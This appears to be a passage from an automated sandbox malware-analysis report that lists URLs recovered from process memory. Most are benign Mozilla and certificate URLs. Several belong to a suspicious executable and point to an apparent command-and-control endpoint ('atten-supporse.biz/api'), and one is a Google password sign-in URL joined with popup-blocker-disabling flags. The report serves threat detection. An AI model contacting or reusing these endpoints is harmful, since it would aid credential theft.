Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureIds/itemscreateContextWithTimeout/get/
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureValidationOptOut
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/greasePaddingSize
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/id
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isEnrollmentPaused
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isRollout
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties/additionalProperties
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/1
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/mdnFeatureGate
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEnabled
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoProviders
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoTimeoutMs
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/migrateExtensions
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/networkPredictor
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/priority
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/slug
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/preconnect
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/proposedDurationhttp://mozilla.org/#/properties/featureIds
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/proposedEnrollment
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestions
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestDataCollectionEnabled
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsNonSponsoredEnabled
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabled
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestOnboardingDialogVariation
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsDataType
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsEnabled
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestShouldShowOnboardingDialog
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestShowOnboardingDialogAfterNRestarts
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/recordNavigationalSuggestionTelemetry
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/referenceBranch
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/schemaVersion
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showPreferencesEntrypoint
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/slug
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/targeting
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/userFacingDescription
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/userFacingName
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywords
Source: firefox.exe, 00000023.00000003.3209291549.00000132C23B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3297565804.00000132C22F7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3303931550.00000132C3B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3258400388.00000132B9D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3291034654.00000132BDC58000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3294052745.00000132BDE03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3258400388.00000132B9DD9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3260198511.00000132BA20F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3266008650.00000132BAEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3298965968.00000132C2376000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3253578763.00000132B7BFC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3281670424.00000132BBA64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3262853359.00000132BA903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3209291549.00000132C2376000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3263225865.00000132BAA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3266008650.00000132BAECD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3285902389.00000132BCF70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3276641087.00000132BB475000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3285460751.00000132BCE03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3298965968.00000132C23B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3298965968.00000132C23F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: feb3d39b6a.exe, 00000013.00000003.3005610732.0000000005613000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3208690769.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3267365896.00000132BB0A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: feb3d39b6a.exe, 00000013.00000003.3005610732.0000000005613000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3208690769.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3267365896.00000132BB0A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 00000023.00000003.3140371807.00000132BA4DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3261062715.00000132BA4DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000023.00000003.3209291549.00000132C2392000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3298965968.00000132C2392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 00000023.00000003.3209291549.00000132C2392000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3298965968.00000132C2392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 00000023.00000003.3209291549.00000132C2392000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3298965968.00000132C2392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 00000023.00000003.3140371807.00000132BA4DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3261062715.00000132BA4DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000023.00000003.3140371807.00000132BA4DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3261062715.00000132BA4DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%shttps://mail.inbox.lv/compose?to=%shttp://poczta.interia.pl/mh/
Source: feb3d39b6a.exe, 00000016.00000002.3324968173.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.c
Source: file.exe, file.exe, 00000000.00000002.2618534099.000000006C54D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-update
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updateapp.update.checkOnlyInstance.enabledPREF_APP_UPDATE_NO_WINDOW_
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3304363170.00000132C3CD5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3201091459.00000132C3CD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3207024753.00000132C41C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3285902389.00000132BCF62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3266858592.00000132BAFA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3228925027.00000132BBEE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6ABF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3283033515.00000132BBE4D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3284059595.00000132BCC8C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3228925027.00000132BBEA7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3281670424.00000132BBABA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3270548472.00000132BB365000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3262853359.00000132BA903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A25000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6AA9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3285902389.00000132BCF70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3261762897.00000132BA793000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3298965968.00000132C23B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3284661125.00000132BCD7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000023.00000002.3285902389.00000132BCF62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul%
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulPanelUI._onNotificationButtonEvent(even
Source: file.exe, 00000000.00000002.2611716092.000000000566C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2618365714.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: feb3d39b6a.exe, 00000013.00000003.3005610732.0000000005613000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3208690769.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3209291549.00000132C2392000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3303931550.00000132C3B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3298965968.00000132C2392000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3267365896.00000132BB0A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: feb3d39b6a.exe, 00000013.00000003.3005610732.0000000005613000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3208690769.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3209291549.00000132C2392000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3303931550.00000132C3B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3298965968.00000132C2392000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3267365896.00000132BB0A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000023.00000002.3303203265.00000132C2B7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3258234904.00000132B9C70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3125373422.00000132BA800000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3126717821.00000132BAA38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: file.exe, 00000000.00000002.2604363979.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2952997493.0000000005609000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2953964028.0000000005606000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119507696.00000000056A6000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3118840439.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119123250.00000000056A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.ca
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.catranslations-panel-from-labeltranslations-panel-to-labelbrowser.topsites
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 00000023.00000002.3298965968.00000132C23CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3303203265.00000132C2BB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3260198511.00000132BA20F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3209291549.00000132C23CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3287630311.00000132BD1C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000023.00000002.3238991466.00000132AC460000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser-check--disable-popup-blockin
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.orghttps://monitor.firefox.comhttps://support.mozilla.orgtestPermissionFromPr
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3282517712.00000132BBD54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3276641087.00000132BB424000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3276641087.00000132BB46A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3267365896.00000132BB0E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etpresource://search-extensions/amazondotcom/amazondotcom%40sear
Source: firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3316055038.000004E319904000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://allegro.pl/
Source: feb3d39b6a.exe, 00000016.00000002.3324968173.0000000000F73000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.b
Source: feb3d39b6a.exe, 00000016.00000003.3287085381.0000000000F76000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3234618879.0000000000F74000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3207291870.0000000000F74000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000002.3324968173.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/
Source: feb3d39b6a.exe, 00000013.00000003.3072644403.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3046875375.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3280658869.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3033374446.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3047109889.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3072213446.0000000000F76000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3046584930.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3005504175.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3278865021.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3078878997.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3033026272.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3005300210.0000000000F74000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3005248474.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3156363925.0000000000F76000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3033744363.0000000000F75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/3
Source: feb3d39b6a.exe, 00000013.00000003.3078690137.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3072000215.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2977685689.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/C
Source: feb3d39b6a.exe, 00000013.00000002.3327603670.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/L
Source: feb3d39b6a.exe, 00000016.00000003.3160404403.0000000000F74000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/_
Source: feb3d39b6a.exe, 00000016.00000002.3328020081.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119400538.0000000000F74000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/api
Source: feb3d39b6a.exe, 00000016.00000002.3324968173.0000000000EF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/api?/
Source: feb3d39b6a.exe, 00000013.00000003.3280395469.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apiD
Source: feb3d39b6a.exe, 00000016.00000002.3328020081.0000000000F93000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apiR
Source: feb3d39b6a.exe, 00000016.00000002.3328020081.0000000000F93000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apin
Source: feb3d39b6a.exe, 00000013.00000003.3270730206.0000000000F86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apitW
Source: feb3d39b6a.exe, 00000013.00000003.3280395469.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/c
Source: feb3d39b6a.exe, 00000016.00000002.3324968173.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/f
Source: feb3d39b6a.exe, 00000016.00000002.3324968173.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/~
Source: feb3d39b6a.exe, 00000013.00000003.3033326578.00000000055D9000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3096594731.00000000055E4000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3269645415.00000000055D2000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3045991842.00000000055DA000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3071802109.00000000055E4000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000002.3344090498.00000000055E4000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3151443466.00000000055E4000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2977665839.00000000055DA000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2978686091.00000000055D8000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2978405456.00000000055D8000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3151443466.00000000055DA000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3095967786.00000000055E4000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3032985887.00000000055D9000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3096292702.00000000055DA000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000002.3324968173.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/api
Source: feb3d39b6a.exe, 00000016.00000002.3324968173.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/apiicrosoft
Source: firefox.exe, 00000023.00000003.3227061861.00000132C27B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3227061861.00000132C27AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 00000023.00000003.3227061861.00000132C27B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 00000023.00000002.3302865830.00000132C279C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3208780144.00000132C279C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3303931550.00000132C3B23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 00000023.00000002.3240579668.00000132B60AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: firefox.exe, 00000023.00000002.3240579668.00000132B60AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: firefox.exe, 00000023.00000002.3281670424.00000132BBABA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3261762897.00000132BA737000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3282517712.00000132BBD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
